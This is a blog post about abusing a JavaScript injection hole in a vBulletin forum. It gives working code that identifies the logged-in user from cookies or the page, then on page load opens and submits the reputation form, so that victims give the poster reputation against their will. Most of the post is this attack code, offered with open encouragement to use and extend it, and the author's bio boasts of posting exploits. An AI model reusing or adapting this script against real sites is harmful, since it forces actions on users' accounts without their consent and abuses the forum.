Fun with JavaScript injection.
UPDATE: Now that I’ve patched the exploit, you might no longer be able to inject your code. So in this post I’ll just assume that you’ve found your way to inject code and are curious as to what you can do now.
Now that we can inject JavaScript into our posts, why not have some fun with it?
How about we make some users give us some reputation? I wrote some functions which make this quite easy.
This is only a part of a class I wrote, and I’m not going to post it all (as of now).
this.getUserId = function()
{
// Check vB cookie first
var vbcookie = readCookie(COOKIE PREFIX + 'userid'); // You need to find out the prefix by yourself.
if (vbcookie !== null)
return parseInt(vbcookie);
// Check for custom cookie
var userid = readCookie('_u');
if (userid !== null)
return parseInt(userid);
// Is on a page without tools menu.
if (!document.getElementById('usercptools_menu'))
return 0;
var links = document.getElementById('usercptools_menu').getElementsByTagName('a');
var total = links.length;
for (var i = 0; i < total; i++)
{
var result = links[i].href.match(/member\.php\?u=(\d+)/);
if (result && result[1])
{
createCookie('_u', result[1], 365); // Cookie for faster and safer access next time.
return parseInt(result[1]);
}
}
return 0;
}
This code attempts to get the current user’s ID whenever possible, so we can filer the users. Meaning we can decide which users we want to “attack”.
The cookie functions I’m using can be found here.
So, now that we can chose the affected users, let’s make them “rep” us. I’m not going to explain the whole code. If you understand it, you’ll see what changes you’re gonna have to make. Otherwise you probably shouldn’t be reading this blog in first place.
window.onload = function()
{
var userid = this.getUserID();
if (userid != 0 && [array, of, ids].indexOf(userid) == -1)
{
var rep = document.getElementsByTagName('a');
var images;
for (var r = 0; r < rep.length; r++)
{
if (rep[r].href && rep[r].href.indexOf('reputation.php') != -1)
{
images = rep[r].getElementsByTagName('img');
if (images && images[0] && images[0].title && images[0].title.indexOf('Add to XXXXX\'s R') != -1)
{
id = rep[r].id.substr(rep[r].id.lastIndexOf("_") + 1);
var A = vBrep.reps[id];
if (A.vbmenu == null)
A.populate();
else
{
if (vBmenu.activemenu != A.vbmenuname)
A.vbmenu.show(fetch_object(A.vbmenuname));
else
A.vbmenu.hide();
}
window.setTimeout('submit_Rep()', 1000);
break;
}
}
}
delete rep;
}
}
function submit_Rep()
{
var reason = document.getElementsByName('reason');
if (!reason && !reason[0])
return window.setTimeout('submit_Rep()', 1000);
reason[0].value = 'Message goes here';
var A = vBrep.reps[id];
A.submit();
}
This will make users “rep” you, whether they want to or not. Although, they will probably get annoyed, because this will attempt to give reputation every time they open one of the threads you replied to. We could easily set a cookie to only make them rep you once a week or something. But I’ll leave that up to you. I’ve done the most difficult part for you already.
Happy experimenting.
About Me
I search the web for exploits, and post things I probably shouldn't post.
